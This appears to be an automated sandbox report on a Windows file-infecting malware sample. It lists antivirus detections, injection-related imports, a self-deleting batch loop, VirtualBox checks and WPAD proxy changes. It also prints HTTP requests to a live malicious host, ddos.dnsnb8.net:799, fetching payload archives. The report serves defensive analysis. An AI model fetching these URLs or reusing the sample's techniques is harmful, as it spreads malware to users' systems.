6.0
High risk

44115eaa38b20fb9b419ec838e077ccb9a6acc1f35475f263a022b43cbfc3457

a958931367991102ede9523698e28116.exe

Analysis duration

75s

Last analysis

File size

42.5KB
Static detection / Dynamic detection: 100% A + W32 A0PT9+JOAJW AI SCORE=74 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR GENASA HIGH CONFIDENCE JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER RAMNIT ROUE SCORE SMALL STATIC AI UNSAFE VJADTRE WALI WAPOMI
Hawkeye engine
Not detected (no Hawkeye engine results available)
Static verdict
Antivirus engines
Engine      | Result                              | Scan date | Engine version
Alibaba     | Virus:Win32/Nimnul.f7bf5fec         | 20190527  | 0.3.0.5
CrowdStrike | win/malicious_confidence_100% (W)   | 20190702  | 1.0
Baidu       | Win32.Virus.Otwycal.d               | 20190318  | 1.0.0.2
Tencent     | Virus.Win32.Loader.aab              | 20201211  | 1.0.0.1
Kingsoft    |                                     | 20201211  | 2017.9.26.565
McAfee      | W32/Kudj                            | 20201211  | 6.0.6.653
Static indicators
Command line console output was observed (50 of 382 events)
Time & API Arguments Status Return Repeated
1619827314.617999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.632999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827314.679999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.836999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827314.851999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827314.867999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.882999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827314.882999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.882999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827314.898999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827314.898999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.898999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827314.914999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.929999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827314.945999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827314.961999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827314.976999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827314.992999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827314.992999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827314.992999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.023999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827315.054999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827315.070999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.070999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827315.086999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.086999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827315.086999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827315.148999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.148999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827315.148999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.226999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827315.242999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827315.257999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.257999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827315.273999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.273999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827315.273999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619827315.304999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.304999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619827315.304999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.336999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe
console_handle: 0x00000007
success 1 0
1619827315.336999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619827315.367999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619827315.367999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619827315.382999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\qeOcSM.exe"
console_handle: 0x00000007
success 1 0
1619827315.382999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619827315.382999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
Tries to locate where the browsers are installed (1 event)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)
section %L\x08m\xa3u\xda
Behavior verdict
Dynamic indicators
Creates executable files on the filesystem (24 events)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34b359ef.bat
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\qeOcSM.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\09552358.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\71B65E8E.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\100B2D25.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\465C695C.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\16EE2AAC.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\47544E73.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\789A5C15.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\28071AC5.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\636E227E.exe
Drops a binary and executes it (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34b359ef.bat
Drops an executable to the user AppData folder (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\qeOcSM.exe
A process created a hidden window (1 event)
Time & API Arguments Status Return Repeated
1619826900.398103
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34b359ef.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\34b359ef.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619826880.554103
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 6.934625482785179 section {'size_of_data': '0x00004200', 'virtual_address': '0x0004c000', 'entropy': 6.934625482785179, 'name': '%L\\x08m\\xa3u\\xda', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
entropy 0.39759036144578314 description Overall entropy of this PE file is high
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 events)
Time & API Arguments Status Return Repeated
1619826883.148103
RegSetValueExA
key_handle: 0x00000404
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000404
value: 0¤°>ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000404
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619826883.148103
RegSetValueExW
key_handle: 0x00000404
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000410
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000410
value: 0¤°>ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619826883.148103
RegSetValueExA
key_handle: 0x00000410
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619826883.179103
RegSetValueExW
key_handle: 0x000003e8
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x000003c8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x000003c8
value: ðû.?ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x000003c8
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619826883.961103
RegSetValueExW
key_handle: 0x000003c8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x0000040c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x0000040c
value: ðû.?ó=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619826883.961103
RegSetValueExA
key_handle: 0x0000040c
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 events)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 of 60 events)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Application.Agent.GKV
FireEye Generic.mg.a958931367991102
Cylance Unsafe
VIPRE Virus.Win32.Small.acea (v)
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.f7bf5fec
K7GW Virus ( 0040f7441 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Application.Agent.GKV
Baidu Win32.Virus.Otwycal.d
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Downloader-64720
Kaspersky Virus.Win32.Nimnul.f
BitDefender Application.Agent.GKV
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Tencent Virus.Win32.Loader.aab
Ad-Aware Application.Agent.GKV
TACHYON Virus/W32.Ramnit.C
Sophos ML/PE-A + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
Zillya Virus.Nimnul.Win32.5
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Kudj.ph
Emsisoft Application.Agent.GKV (B)
Ikarus Trojan-Downloader.Win32.Small
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03202201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
Cynet Malicious (score: 100)
AhnLab-V3 Win32/VJadtre.Gen
Acronis suspicious
McAfee W32/Kudj
MAX malware (ai score=74)
VBA32 Virus.Nimnul.19209
Zoner Virus.Win32.23755
ESET-NOD32 Win32/Wapomi.BA
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No screenshots: no screenshots were captured while this sample ran


PE Compile Time

2017-04-06 06:17:44

Imports

Library ADVAPI32.dll:
0x449220 OpenProcessToken
Library KERNEL32.dll:
0x449228 CloseHandle
0x44922c CreateFileW
0x449230 CreateRemoteThread
0x44923c DuplicateHandle
0x449248 GetCommandLineW
0x44924c GetCurrentProcess
0x449250 GetCurrentProcessId
0x449254 GetCurrentThreadId
0x449258 GetExitCodeThread
0x44925c GetFullPathNameW
0x449260 GetLastError
0x449264 GetLongPathNameW
0x449268 GetModuleHandleA
0x44926c GetModuleHandleW
0x449270 GetProcAddress
0x449274 GetStartupInfoA
0x449278 GetSystemInfo
0x449280 GetTickCount
0x44928c LoadLibraryA
0x449290 MoveFileW
0x449294 OpenProcess
0x449298 OpenThread
0x44929c Process32FirstW
0x4492a0 Process32NextW
0x4492a8 QueueUserAPC
0x4492ac ReadProcessMemory
0x4492b0 ResumeThread
0x4492b8 Sleep
0x4492bc TerminateProcess
0x4492c0 TlsGetValue
0x4492c8 VirtualAllocEx
0x4492cc VirtualFreeEx
0x4492d0 VirtualProtect
0x4492d4 VirtualQuery
0x4492d8 VirtualQueryEx
0x4492dc WaitForSingleObject
0x4492e0 WriteFile
0x4492e4 WriteProcessMemory
0x4492e8 lstrlenW
Library msvcrt.dll:
0x4492f0 __dllonexit
0x4492f4 __getmainargs
0x4492f8 __initenv
0x4492fc __lconv_init
0x449300 __set_app_type
0x449304 __setusermatherr
0x449308 _acmdln
0x44930c _amsg_exit
0x449310 _cexit
0x449314 _errno
0x449318 _fmode
0x44931c _initterm
0x449320 _iob
0x449324 _lock
0x449328 _onexit
0x44932c calloc
0x449330 exit
0x449334 fprintf
0x449338 free
0x44933c fwrite
0x449340 iswctype
0x449344 malloc
0x449348 memcpy
0x44934c memset
0x449350 printf
0x449354 signal
0x449358 strlen
0x44935c strncmp
0x449360 _unlock
0x449364 _wgetenv
0x449368 abort
0x44936c vfprintf
0x449370 wcscmp
0x449374 wcscpy
0x449378 wcstol
0x44937c _vsnprintf
0x449380 _wcsicmp
Library SHELL32.dll:
0x449388 CommandLineToArgvW
Library SHLWAPI.dll:
0x449390 PathFileExistsW
Library USER32.dll:
0x449398 MessageBoxA
0x44939c wsprintfW

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49177 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49178 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49186 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49187 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49190 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k3.rar
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k2.rar
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k5.rar
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k4.rar
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.